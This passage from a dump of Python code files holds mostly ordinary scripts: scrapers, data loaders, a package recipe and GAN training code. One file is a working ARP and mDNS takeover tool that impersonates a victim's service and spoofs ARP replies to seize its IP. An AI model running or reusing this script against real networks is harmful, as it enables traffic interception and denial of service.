data = json.load(f)\n return data['sheet'], data['index']\n except:\n return None, 0\n\ndef write_status(sheetName, index):\n with open(os.path.join(rootpath, 'status', \"status.json\"), 'w') as f:\n data = {'sheet': sheetName, 'index': index}\n json.dump(data, f)\n\n\n# print (get_status())\n# write_status(\"webinar\", 10)\n# print (get_status())\n\n\ndef add_dfToexcel(df, sheetname, columns):\n output_file = output\n\n try:\n last_row = len(pd.read_excel(output_file, sheetname))\n book = load_workbook(output_file)\n writer = ExcelWriter(output_file, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n df.to_excel(writer, sheetname, startrow=last_row + 1, header=False, columns=columns,\n index=False)\n # df.to_excel(writer, sheetname, startrow=last_row + 1, header=False, columns=['c', 'a'],\n # index=False)\n\n writer.save()\n\n except:\n\n book = load_workbook(output_file)\n writer = ExcelWriter(output_file, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n # emtpy_df = pd.DataFrame(columns=columns)\n df.to_excel(writer, sheetname, header=True, columns=columns,\n index=False)\n\n writer.save()\n\n\n# a = pd.Series({'c':'b', 'd':'d'})\n# df = pd.DataFrame([a], columns=list(a.keys()))\n# add_dfToexcel(df, 'test', ['a', 'c'])\n\n\ndef add_dict(json_data, txtname):\n path = os.path.join(rootpath, 'output', txtname)\n if not os.path.exists(path):\n with open(path, 'w') as f:\n # json.dump(data, f)\n f.write(str(json_data))\n else:\n with open(path, 
'a') as f:\n f.write(\"\\n\")\n # json.dump(data, f)\n f.write(str(json_data))\n\n\ndef unscanned_starting(txtname, emails):\n path = os.path.join(rootpath, 'output', txtname)\n if os.path.exists(path):\n with open(path) as f:\n txt_data = f.read()\n count = 0\n while count < len(emails):\n if emails[count] in txt_data:\n count += 1\n else:\n return count\n else:\n return 0\n\n\ndef read_dict(txtname):\n import re\n # path = os.path.join(rootpath, 'output', txtname)\n path = txtname\n data_list = []\n if os.path.exists(path):\n with open(path, 'r') as f:\n lines = list(set(re.findall(\"\\{.*?\\}\", f.read().replace(\"\\n\", \"\"))))\n for line in lines:\n line = line.strip(\"\\n\")\n data = ast.literal_eval(line)\n data.pop('', None)\n data_list.append(data)\n\n return data_list\n\n\ndef google_search(keyword):\n for url in search(keyword, stop=20):\n print(url)\n\n\ndef get_keyword1(df):\n return df['First Name'] + \" \" + df['Last Name'] + ' at ' + df['Company / Account']\n\n\ndef excel_addColumns(filename, column_data):\n from openpyxl import load_workbook\n from pandas import ExcelWriter\n book = load_workbook(filename)\n writer = ExcelWriter(filename, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n\ndef find_similarity(data_list):\n pairs = []\n for item in data_list:\n if item.strip('S') in data_list and item.strip('S') != item:\n pairs.append((item, item.strip('S')))\n\n return pairs\n\n\ndef polish_data(data):\n df = pd.DataFrame(data)\n df.fillna(\"\", inplace=True)\n new_columns = [item.strip(\":\") for item in list(df.columns.values)]\n df.columns = new_columns\n\n merge_columnPairs = find_similarity(list(df.columns.values))\n # print (merge_columnPairs)\n for item in merge_columnPairs:\n df[item[1]] = df[item[1]] + df[item[0]]\n\n del df[item[0]]\n\n return df\n\n\ndef makeExcel_fromTxt():\n txt_files = glob.glob(os.path.join(rootpath, 'output', '*.txt'))\n for txt_file in txt_files[:1]:\n data = read_dict(txt_file)\n extraDf = polish_data(data)\n print (list(extraDf.columns))\n # sheetname = ntpath.basename(txt_file).split(\"_more\")[0]\n # df = pd.read_excel(source_file, sheetname)\n # new_df = pd.merge(df, extraDf, on='email')\n\n# makeExcel_fromTxt()\n\n# google_search(\"Ariel Crohn at Coverys\")\n# https://pipl.com/search/?q=jimmy.bourdon%40parexel.com&in=5&l=&sloc=\n\n# make_doc(\"webina\", dict_data)\n\n\n# a = {'a':'b', 'c':'d'}\n# b = {'e':'f', 'g':'h'}\n# add_json(a, 'a.txt')\n# add_json(b, 'a.txt')\n# read_dict(\"a.txt\")\n","repo_name":"hideki-saito/contact-info","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19359678345","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom news_all.spider_models import NewsRCSpider, otherurl_meta\nfrom news_all.tools.time_translater import Pubtime\n\n\nclass Zgnb_allSpider(NewsRCSpider):\n \"\"\"中国宁波网\"\"\"\n name = 'zgnb'\n mystart_urls = {\n 'http://news.cnnb.com.cn/tyxw/': 1301621, # 中国宁波网-体育\n 'http://news.cnnb.com.cn/gnyw/gngdxw/index.shtml': 1301622, # 中国宁波网-各地\n 'http://news.cnnb.com.cn/gnyw/gnsz/': 1301624, # 中国宁波网-国内-左侧列表\n 'http://news.cnnb.com.cn/gjyw/guojyw/': 1301623, # 中国宁波网-国际-左侧列表\n 'http://news.cnnb.com.cn/ylxw/': 1301626, # 中国宁波网-娱乐新闻-文娱列表\n 'http://news.cnnb.com.cn/gjyw/hqsy/index.shtml': 1301625, # 
中国宁波网-环球\n 'http://news.cnnb.com.cn/shxw/': 1301620, # 中国宁波网-社会\n # 'http://finance.cnnb.com.cn/zixun/': 1301619, # 中国宁波网-经济资讯 --此网页打不开 已忽略掉\n }\n rules = (\n # http://news.cnnb.com.cn/system/2019/06/11/030058939.shtml\n # http://news.cnnb.com.cn/system/2019/06/12/030059131.shtml\n Rule(LinkExtractor(allow=(r'news.cnnb.com.cn/system/%s/\\d{2}/\\d+.s?htm' % datetime.today().strftime('%Y/%m')),\n ), callback='parse_item',\n follow=False),\n Rule(LinkExtractor(allow=(r'cnnb.com.cn.*?/\\d+.s?htm'), deny=(r'/201[0-8]', r'/2019/0[1-9]')\n ), process_request=otherurl_meta,\n follow=False),\n )\n\n def parse_item(self, response):\n xp = response.xpath\n try:\n title = xp(\"//div[@class='heading']/text()\").extract_first()\n source = xp(\"//div[@class='source']/span[@class='left']\")[0]\n content_div = xp(\"//div[@id='Zoom']\")[0]\n pubtime = Pubtime(source.extract())\n origin_name = source.xpath('./span[@class=\"left\"]/a/text()').extract_first('')\n content, media, videos, _ = self.content_clean(content_div, need_video=True)\n except BaseException:\n return self.produce_debugitem(response, \"xpath error\")\n\n return self.produce_item(\n response=response,\n title=title,\n pubtime=pubtime,\n origin_name=origin_name,\n content=content,\n media=media,\n videos=videos\n )\n","repo_name":"Pintrue/news_all","sub_path":"news_all/spiders_old/zgnb_all.py","file_name":"zgnb_all.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15451076144","text":"from spack.package import *\n\n\nclass PerlEmailStuffer(PerlPackage):\n \"\"\"A more casual approach to creating and sending Email:: emails\"\"\"\n\n homepage = \"https://metacpan.org/pod/Email::Stuffer\"\n url = \"https://cpan.metacpan.org/authors/id/R/RJ/RJBS/Email-Stuffer-0.020.tar.gz\"\n\n maintainers(\"EbiArnie\")\n\n license(\"Artistic-1.0-Perl OR GPL-1.0-or-later\")\n\n version(\"0.020\", sha256=\"0a1efb7f2dedd39052b126f718ca2d3b5845a4123a39392fd9dfa0c76e6057c7\")\n\n depends_on(\"perl@5.12.0:\", type=(\"build\", \"link\", \"run\", \"test\"))\n depends_on(\"perl-email-mime@1.943:\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-email-sender\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-module-runtime\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-moo\", type=(\"build\", \"test\"))\n depends_on(\"perl-params-util@1.05:\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-test-fatal\", type=(\"build\", \"test\"))\n\n def test_use(self):\n \"\"\"Test 'use module'\"\"\"\n options = [\"-we\", 'use strict; use Email::Stuffer; print(\"OK\\n\")']\n\n perl = self.spec[\"perl\"].command\n out = perl(*options, output=str.split, error=str.split)\n assert \"OK\" in out\n","repo_name":"tmadlener/spack","sub_path":"var/spack/repos/builtin/packages/perl-email-stuffer/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"18560780796","text":"x=int(input(\"enter how many prime numbers do you want to print\"))\r\ni=1\r\nwhile x>=i:\r\n s=0\r\n j=1\r\n while j<=i:\r\n if i%j==0:\r\n s+=1\r\n j+=1\r\n if s<=2:\r\n print(i)\r\n 
i+=1\r\n","repo_name":"saikumar8639/letsupgrade_python_assignment_2","sub_path":"while_assignment2_day3_letsupgrade.py","file_name":"while_assignment2_day3_letsupgrade.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41386482586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2023/4/23 17:58\n# @Author : 刘秉星\n# @Site : \n# @File : dataset.py\n# @Software: PyCharm\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\n\n\ndef get_data_loaders(train_path, test_path):\n transform = transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.Resize((28, 28)),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ])\n\n train_dataset = ImageFolder(root=train_path, transform=transform)\n test_dataset = ImageFolder(root=test_path, transform=transform)\n\n train_loader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n test_loader = DataLoader(test_dataset, batch_size=64, shuffle=False)\n return train_loader, test_loader\n\ndef get_data_loaders_VGG(train_path, test_path):\n transform = transforms.Compose([\n transforms.Grayscale(num_output_channels=3), # 将图像复制到3个通道以模拟RGB图像\n transforms.Resize((224, 224)), # 修改图像大小为224x224\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n train_dataset = ImageFolder(root=train_path, transform=transform)\n test_dataset = ImageFolder(root=test_path, transform=transform)\n\n train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n test_loader = DataLoader(test_dataset, batch_size=32, shuffle=False)\n\n return train_loader, test_loader","repo_name":"ZenithNUC/MTC2023-train","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24109392513","text":"import logging\n\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import ListField\nfrom rest_framework.serializers import Serializer\n\nfrom API.variables import NUM_ERRORS_LIMIT\nfrom API.objects import Input, Analysis, Alternative, Bcn, Sensitivity\nfrom API.serializers import AnalysisSerializer, AlternativeSerializer, BCNSerializer, SensitivitySerializer, \\\n ScenarioSerializer\n\n\nclass InputSerializer(Serializer):\n \"\"\"\n Object serializer for main input object.\n \"\"\"\n\n analysisObject = AnalysisSerializer(required=True)\n alternativeObjects = ListField(child=AlternativeSerializer(), required=True)\n bcnObjects = ListField(child=BCNSerializer(), required=True)\n sensitivityObjects = ListField(child=SensitivitySerializer(required=False), required=False)\n scenarioObject = ScenarioSerializer(required=False)\n\n def validate(self, data):\n errors = []\n\n study_period = data[\"analysisObject\"][\"studyPeriod\"]\n for bcn in data[\"bcnObjects\"]:\n if \"quantVarValue\" in bcn and bcn[\"quantVarValue\"] is not None:\n quant_var_value = bcn[\"quantVarValue\"]\n\n try:\n assert (isinstance(quant_var_value, list) and len(quant_var_value) == study_period + 1) \\\n or (quant_var_value is not None)\n except:\n errors.append(\n ValidationError(\n f\"The length of quantVarValue for BCN {bcn['bcnID']} is not equal to the study \"\n f\"period {study_period + 1}. 
Given {quant_var_value}\"\n )\n )\n\n if bcn[\"recurBool\"] is True and bcn[\"recurVarValue\"] is not None:\n recur_var_value = bcn[\"recurVarValue\"]\n\n try:\n assert (isinstance(recur_var_value, list) and len(recur_var_value) == study_period + 1) \\\n or recur_var_value is not None\n except:\n errors.append(\n ValidationError(\n f\"The length of recurVarValue for BCN {bcn['bcnID']} is not equal to the study \"\n f\"period {study_period + 1}. Given {recur_var_value}\"\n )\n )\n\n # Ensure that only one alternative has baselineBool = True.\n try:\n assert len([x for x in data[\"alternativeObjects\"] if x[\"baselineBool\"]]) == 1\n except:\n errors.append(\n ValidationError(\"Only one alternative can be the baseline.\")\n )\n\n # if data['sensitivityObjects'] is not None:\n # # Check bcnID references an existing BCN object\n # bcnIDList = []\n # for bcn in data['bcnObjects']:\n # bcnIDList.append(bcn['bcnID'])\n #\n # for sensitivity_object in data['sensitivityObjects']:\n # if sensitivity_object['bcnID'] not in bcnIDList:\n # errors.append(ValidationError(\"bcnID does not correspond to a valid bcn object\"))\n\n if errors:\n raise(ValidationError(errors[:NUM_ERRORS_LIMIT])) # Throws up to NUM_ERRORS_LIMIT number of errors.\n\n return data\n\n def create(self, validated_data):\n analysis = Analysis(**validated_data.pop(\"analysisObject\"))\n bcn_cache = {}\n for data in validated_data.pop(\"bcnObjects\"):\n bcn_cache[data[\"bcnID\"]] = Bcn(analysis.studyPeriod, **data)\n\n for sens_data in validated_data.get(\"sensitivityObjects\", []):\n if sens_data['globalVarBool'] is False:\n Sensitivity(bcnObj=bcn_cache[sens_data[\"bcnID\"]].bcnName, **sens_data)\n\n return Input(\n analysis,\n [Alternative(**data) for data in validated_data.pop(\"alternativeObjects\")],\n list(bcn_cache.values()),\n [Sensitivity(bcnObj=None, **sens_data) for sens_data in validated_data.get(\"sensitivityObjects\", [])],\n None,\n )\n\n def update(self, instance, validate_data):\n instance.analysis = validate_data.get(\"analysisObject\", instance.analysis)\n instance.alternatives = validate_data.get(\"alternativeObjects\", instance.alternatives)\n instance.bcns = validate_data.get(\"bcnObjects\", instance.bcns)\n instance.sensitivity = validate_data.get(\"sensitivityObjects\", instance.sensitivity)\n instance.scenario = validate_data.get(\"scenarioObject\", instance.scenario)\n\n return instance\n","repo_name":"usnistgov/E3","sub_path":"e3_django/API/serializers/InputSerializer.py","file_name":"InputSerializer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"43020361594","text":"import scapy.all as scapy\nimport sys\nimport time\nimport re \nfrom zeroconf import ServiceBrowser, Zeroconf, IPVersion, ServiceInfo\nimport socket\n\n\nclass MalListener:\n def __init__(self):\n self.infos = []\n self.ip = \"127.0.0.1\"\n self.names = []\n self.got_one = False\n def remove_service(self, zeroconf, type, name):\n print(\"Service %s removed\" % (name,))\n def add_service(self, zeroconf, type, name): #Pick the first service and copy it, and grab the IP. 
The basis for this section is mostly copied from Rob Guderian's example\n info = zeroconf.get_service_info(type, name)\n if not self.got_one:\n print(\"Copying: %s\" % (info,))\n zc.register_service(info)\n self.got_one = True\n print(socket.inet_ntoa(info.addresses[0]))\n self.ip = socket.inet_ntoa(info.addresses[0])\n \n def update_service(self, zeroconf, type, name):\n info = zeroconf.get_service_info(type, name)\n \n\n\ndef send_broadcast_request(ip): #Send broadcast ARP request for IP\n pkt = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(op = who, pdst = ip, hwdst = \"00:00:00:00:00:00\", psrc = \"0.0.0.0\")\n print(\"Sending broadcast request\")\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_broadcast_announce(ip): #Announce IP in an ARP broadcast\n pkt = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(op = who, pdst = ip, hwdst = \"00:00:00:00:00:00\", psrc = ip)\n print(\"Sending broadcast announce\")\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_reply(ip, mac): #Reply to an arp request from mac for ip\n pkt = scapy.Ether(dst=mac)/scapy.ARP(op = reply, pdst = ip, hwdst = mac, psrc = ip_global)\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_spoof_reply(ip, req_mac, req_ip): #Send a spoofed ARP reply claiming we own the requested IP\n pkt = scapy.Ether(dst=req_mac)/scapy.ARP(op = is_at, pdst = req_ip, hwdst = req_mac, psrc = ip)\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef handle_new_packet(pkt): #Print received non-arp packets\n print(\"received new packet:\")\n print(scapy.ls(pkt))\n return\ndef handle_arp_packet(pkt):\n if pkt[scapy.ARP].op == reply and pkt[scapy.ARP].psrc == ip_global and pkt[scapy.Ether].src != mac_global and pkt[scapy.Ether].src != \"00:00:00:00:00:00\": #If this is the victim, grab their MAC\n global vicmac \n vicmac = pkt[scapy.Ether].src\n print(\"Got victim mac: \", vicmac)\n elif pkt[scapy.ARP].op == who and pkt[scapy.ARP].pdst == ip_global and pkt[scapy.Ether].src != mac_global: #If this is an ARP request for us, reply\n print(\"Got ARP request. 
Sending reply.\")\n send_reply(pkt[scapy.ARP].psrc, pkt[scapy.Ether].src)\n elif pkt[scapy.ARP].op == who: #If this is an arp request from the victim, tell them that we already have that IP\n ll_match = ll_re.match(str(pkt[scapy.ARP].pdst ))\n if ll_match and pkt[scapy.Ether].src == vicmac:\n print('Got ARP request for ', pkt[scapy.ARP].pdst, \"from \", pkt[scapy.Ether].src, \"/\", pkt[scapy.ARP].psrc, \" replying saying that's us\")\n send_spoof_reply(pkt[scapy.ARP].pdst, pkt[scapy.Ether].src, pkt[scapy.ARP].psrc)\n \n return\n\nll_re = re.compile(r\"^169\\\\.254\\\\.\") #Match link-local addresses\nwho=1\nreply=2\nis_at = 2\niface_global = \"\"\nip_global = \"\"\nmac_global = \"\"\nvicmac = \"\"\nif len(sys.argv) == 3:\n    zc = Zeroconf(ip_version=IPVersion.V4Only)\n    ml = MalListener()\n    zone = sys.argv[1]\n    browser = ServiceBrowser(zc, zone, ml)\n\n    while ml.ip == \"127.0.0.1\": #Wait til we get an IP for our victim\n        time.sleep(1)\n    iface_global = sys.argv[2]\n    ip = ml.ip\n    ip_global = ml.ip\n    mac_global = scapy.get_if_hwaddr(iface_global)\n    s_arp = scapy.AsyncSniffer(filter=\"arp\", iface=iface_global, prn=handle_arp_packet) #Setup ARP handler\n    s_arp.start() \n    send_broadcast_request(ip) #Force victim off of IP and use it ourselves\n    time.sleep(1)\n    send_broadcast_request(ip)\n    time.sleep(1)\n    send_broadcast_request(ip)\n    time.sleep(1)\n    send_broadcast_announce(ip)\n    send_broadcast_announce(ip)\n    send_broadcast_announce(ip)\n    time.sleep(4)\n    s = scapy.AsyncSniffer(filter=\"!arp && dst host %s\" % ip, iface=iface_global, prn=handle_new_packet) #Requires scapy >= 2.4.3 :( - Start general listener\n    s.start()\n    false = True #Just to bug you...\n    while(false):\n        try:\n            time.sleep(5)\n            send_broadcast_announce(ip) #Keep announcing IP in arp. Probably unnecessary \n        except KeyboardInterrupt:\n            s.stop()\n            s_arp.stop()\n            sys.exit(0)\n    zc.unregister_all_services()\n    zc.close()\nelse:\n    print(\"Usage: python3 ./mdns-link-local-takeover.py <zone> <interface>\")\n\n\n\n    \n","repo_name":"davidndyck/zeroconf-jiggery-pokery","sub_path":"mdns-link-local-takeover/mdns-link-local-takeover.py","file_name":"mdns-link-local-takeover.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73710100646","text":"from build_model import *\r\nfrom load_data import *\r\nfrom train import *\r\nimport numpy as np\r\nimport time\r\nfrom tensorflow.keras.optimizers import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Relight_cycle_pretrain:\r\n    def __init__(self):\r\n        self.generator = build_relight()\r\n        self.discriminator = build_discriminator()\r\n        self.opt = Adam(1e-4)\r\n        self.style_l = style_loss()\r\n        self.path = '/home/pomelo96/Desktop/datasets/Yaleb/train'\r\n        self.train_roots, self.train_id, self.train_light, _, _, _ = load_YaleB()\r\n        self.input_image_roots, self.reference_image_roots, self.GT_image_roots, self.id_class \\\r\n            = set_data_for_cycleGAN(self.train_roots, self.train_light, is_pretrain=True)\r\n        self.source_sampling = load_image(get_batch_data(self.input_image_roots, 0, 10))\r\n        self.reference_sampling = load_image(get_batch_data(self.reference_image_roots, 0, 10))\r\n        self.gt_sampling = load_image(get_batch_data(self.GT_image_roots, 0, 10))\r\n\r\n    def gen_train_step(self, source, reference, label):\r\n        label = tf.one_hot(label, depth=32)\r\n        with tf.GradientTape() as tape:\r\n            inputs = tf.concat([source, reference], axis=-1)\r\n            gen_img = self.generator.call(inputs)\r\n            v_gen, c_gen = 
self.discriminator.call(gen_img)\r\n loss_cls = classify_loss(label, c_gen)\r\n loss_adv = adversarial_loss(target = True, pred = v_gen)\r\n loss_img = img_loss(source, gen_img)\r\n loss_style = self.style_l.predict_loss(reference, gen_img)\r\n loss_g = tf.reduce_mean([loss_cls, loss_adv, loss_img, loss_style])\r\n grads = tape.gradient(loss_g, self.generator.trainable_variables)\r\n self.opt.apply_gradients(zip(grads, self.generator.trainable_variables))\r\n\r\n return loss_g, loss_adv, loss_img\r\n\r\n def dis_train_step(self, source, reference, label):\r\n label = tf.one_hot(label, depth=32)\r\n with tf.GradientTape() as tape:\r\n inputs = tf.concat([source, reference], axis=-1)\r\n gen_img = self.generator.call(inputs)\r\n v_gen, c_gen = self.discriminator.call(gen_img)\r\n v_real, c_real = self.discriminator.call(tf.cast(source, dtype='float32'))\r\n # loss_classify_gen = classify_loss(label, c_gen)\r\n #This will make generator's predict all become reference and even id will predicted correctly\r\n #AI magic wtf lol lmao kaobei om gash\r\n loss_classify_real = classify_loss(label, c_real)\r\n loss_adv_gen = adversarial_loss(target=False, pred=v_gen)\r\n loss_adv_real = adversarial_loss(target=True, pred=v_real)\r\n\r\n loss_d = tf.reduce_mean([loss_classify_real, loss_adv_gen, loss_adv_real])\r\n grads = tape.gradient(loss_d, self.discriminator.trainable_variables)\r\n self.opt.apply_gradients(zip(grads, self.discriminator.trainable_variables))\r\n return loss_d, np.mean([loss_adv_gen, loss_adv_real]), np.mean([loss_classify_real])\r\n\r\n def pretrain(self, epochs=200, interval=1, batch_size=32, batch_num=341):\r\n tr_L_G_avg = []\r\n tr_L_G_adv_avg = []\r\n tr_L_G_img_avg = []\r\n tr_L_D_avg = []\r\n tr_L_D_adv_avg = []\r\n tr_L_D_cls_avg = []\r\n start = time.time()\r\n for epoch in range(epochs):\r\n ep_start = time.time()\r\n tr_L_G = []\r\n tr_L_G_adv = []\r\n tr_L_G_img = []\r\n tr_L_D = []\r\n tr_L_D_adv = []\r\n tr_L_D_cls = []\r\n\r\n for b in range(batch_num):\r\n source = load_image(get_batch_data(self.input_image_roots, b, batch_size))\r\n reference = load_image(get_batch_data(self.reference_image_roots, b, batch_size))\r\n target = load_image(get_batch_data(self.GT_image_roots, b, batch_size))\r\n label = get_batch_data(self.id_class, b, batch_size)\r\n loss_g, loss_adv_g, loss_img_g = self.gen_train_step(source, reference, label)\r\n tr_L_G.append(loss_g)\r\n tr_L_G_adv.append(loss_adv_g)\r\n tr_L_G_img.append(loss_img_g)\r\n loss_d, loss_adv_d, loss_cls_d = self.dis_train_step(source, reference, label)\r\n tr_L_D.append(loss_d)\r\n tr_L_D_adv.append(loss_adv_d)\r\n tr_L_D_cls.append(loss_cls_d)\r\n tr_L_G_avg.append(np.mean(tr_L_G))\r\n tr_L_G_adv_avg.append(np.mean(tr_L_G_adv))\r\n tr_L_G_img_avg.append(np.mean(tr_L_G_img))\r\n tr_L_D_avg.append(np.mean(tr_L_D))\r\n tr_L_D_adv_avg.append(np.mean(tr_L_D_adv))\r\n tr_L_D_cls_avg.append(np.mean(tr_L_D_cls))\r\n\r\n t_pass = time.time() - start\r\n m_pass, s_pass = divmod(t_pass, 60)\r\n h_pass, m_pass = divmod(m_pass, 60)\r\n print('\\nTime for pass {:<4d}: {:<2d} hour {:<3d} min {:<4.3f} sec'.format(epoch + 1, int(h_pass),\r\n int(m_pass), s_pass))\r\n print('Time for epoch {:<4d}: {:6.3f} sec'.format(epoch + 1, time.time() - ep_start))\r\n print('Train Loss Gen_adv : {:8.5f}'.format(tr_L_G_adv_avg[-1]))\r\n print('Train Loss Dis_adv : {:8.5f}'.format(tr_L_D_adv_avg[-1]))\r\n print('Train Loss Generator : {:8.5f}'.format(tr_L_G_avg[-1]))\r\n print('Train Loss Gen img : {:8.5f}'.format(tr_L_G_img_avg[-1]))\r\n 
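# Generator-side losses are printed above, discriminator-side below;\r\n            # each minibatch in the loop above ran gen_train_step and then\r\n            # dis_train_step, i.e. the usual alternating GAN update.\r\n            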
print('Train Loss Discriminator : {:8.5f}'.format(tr_L_D_avg[-1]))\r\n print('Train Loss Dis class : {:8.5f}'.format(tr_L_D_cls_avg[-1]))\r\n\r\n if epoch % interval == 0 or epoch + 1 == epochs:\r\n self.sample_images_pretrain(epoch, self.source_sampling, self.reference_sampling, self.gt_sampling)\r\n self.generator.save_weights('pretrain_weight/generator_pretrained_weights_{}'.format(epoch+1))\r\n self.discriminator.save_weights('pretrain_weight/discriminator_pretrained_weights_{}'.format(epoch+1))\r\n return tr_L_G_avg, tr_L_D_avg, tr_L_G_adv_avg, tr_L_D_adv_avg, tr_L_G_img_avg, tr_L_D_cls_avg\r\n\r\n def sample_images_pretrain(self, epoch, source, reference, gt):\r\n\r\n inputs_ = tf.concat([source, reference], -1)\r\n gen_imgs = self.generator.predict(inputs_)\r\n # Rescale images 0 - 1\r\n source = 0.5 * (source + 1)\r\n reference = 0.5 * (reference + 1)\r\n gt = 0.5 * (gt + 1)\r\n gen_imgs = 0.5 * (gen_imgs + 1)\r\n r, c = 4, 10\r\n fig, axs = plt.subplots(r, c, sharex='col', sharey='row', figsize=(25, 25))\r\n plt.subplots_adjust(hspace=0.2)\r\n cnt = 0\r\n for j in range(c):\r\n axs[0, j].imshow(source[cnt], cmap='gray')\r\n axs[0, j].axis('off')\r\n axs[1, j].imshow(gen_imgs[cnt], cmap='gray')\r\n axs[1, j].axis('off')\r\n axs[2, j].imshow(gt[cnt], cmap='gray')\r\n axs[2, j].axis('off')\r\n axs[3, j].imshow(reference[cnt], cmap='gray')\r\n axs[3, j].axis('off')\r\n\r\n cnt += 1\r\n fig.savefig('pretrain_picture/pretrain_{}.png'.format(epoch+1))\r\n plt.close()\r\n\r\nif __name__ == '__main__':\r\n from tensorflow.compat.v1 import ConfigProto\r\n from tensorflow.compat.v1 import InteractiveSession\r\n import os\r\n\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\r\n config = ConfigProto()\r\n config.allow_soft_placement = True\r\n config.gpu_options.per_process_gpu_memory_fraction = 0.8\r\n config.gpu_options.allow_growth = True\r\n session = InteractiveSession(config=config)\r\n\r\n relight_cycle = Relight_cycle_pretrain()\r\n # relight_cycle.generator.load_weights('pretrain_weight/generator_pretrained_weights_10')\r\n # relight_cycle.discriminator.load_weights('pretrain_weight/discriminator_pretrained_weights_10')\r\n tr_L_G_avg, tr_L_D_avg, tr_L_G_adv_avg, tr_L_D_adv_avg, tr_L_G_img_avg, tr_L_D_cls_avg = relight_cycle.pretrain(epochs=20, interval=1)\r\n\r\n plt.plot(tr_L_G_avg)\r\n plt.plot(tr_L_D_avg)\r\n plt.legend(['Generator', 'Discriminator'])\r\n plt.title('Pretrain Generator Loss')\r\n plt.savefig('pretrain_picture/pretrain_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_G_adv_avg)\r\n plt.plot(tr_L_D_adv_avg)\r\n plt.legend(['Generator', 'Discriminator'])\r\n plt.title('Pretrain Adversarial Loss')\r\n plt.savefig('pretrain_picture/pretrain_Adversarial_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_G_img_avg)\r\n plt.legend(['Image loss'])\r\n plt.savefig('pretrain_picture/pretrain_imgae_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_D_cls_avg)\r\n plt.legend(['Classify loss'])\r\n plt.savefig('pretrain_picture/pretrain_classify_loss.jpg')\r\n plt.close()\r\n","repo_name":"isaacchen96/RelightGAN","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":8853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74749480164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 30 14:56:25 2020\n\n@author: Eduin Hernandez\n\"\"\"\n\nimport shelve\nimport numpy as np\nimport matplotlib.pyplot as 
plt\n\n#-----------------------------------------------------------------------------\nfolder_path = './Accuracy/'\nsuffix = '.out'\n\nprefix = 'shelve_accuracy_mnist_dense_'\ntail = ''\n\ntmax = '1'\nepochs_num = 3\n\n'UEP Class Num'\nclass_num = 3\n\n'Coding Type'\noperator_str = ['centralized',\n 'uncoded',\n 'now',\n 'ew',\n 'block_reps']\n\n'Plotting Variables'\n\nstep = 100\nlegend = ['Paramter Server',\n 'Uncoded',\n 'NOW - UEP - 3 Classes',\n 'EW - UEP - 3 Classes',\n 'Block Reps']\n\next_ind = [500, 1000, 1500, 2000] #specific indexes to extract\n\n\n#-----------------------------------------------------------------------------\nwait_str = '_tmax' + tmax\n\ntitle = 'Mnist Classification Accuracy\\n Epochs = ' + str(epochs_num) + ', Tmax = ' + tmax\n\nbase_str = 'centralized'\nuep_str = 'now_ew'\n\n\nacc = {}\nfor op, ind in zip(operator_str, range(len(operator_str))):\n if(op == base_str):\n filename_load = prefix + op + str(epochs_num)\n elif(op in uep_str):\n filename_load = prefix + op + str(epochs_num) + '_class' + str(class_num) + wait_str + tail\n else:\n 